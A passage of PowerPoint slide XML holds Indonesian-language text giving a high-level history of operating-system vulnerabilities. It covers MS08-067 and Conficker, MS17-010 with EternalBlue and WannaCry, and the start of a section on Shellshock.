            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Microsoft Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MS08-067 pada Windows Server Service. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server Windows. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh worm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2008, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginfeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jutaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dunia. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, MS17-010 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirilis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Microsoft pada Maret 2017. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Server Message Block (SMB) Microsoft (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (RCE). Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Signifikansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MS17-010 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyalahgunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ransomware WannaCry pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Mei 2017, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ransomware di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dunia, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggarisbawahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>macOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2014, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "Shellshock" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Unix, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
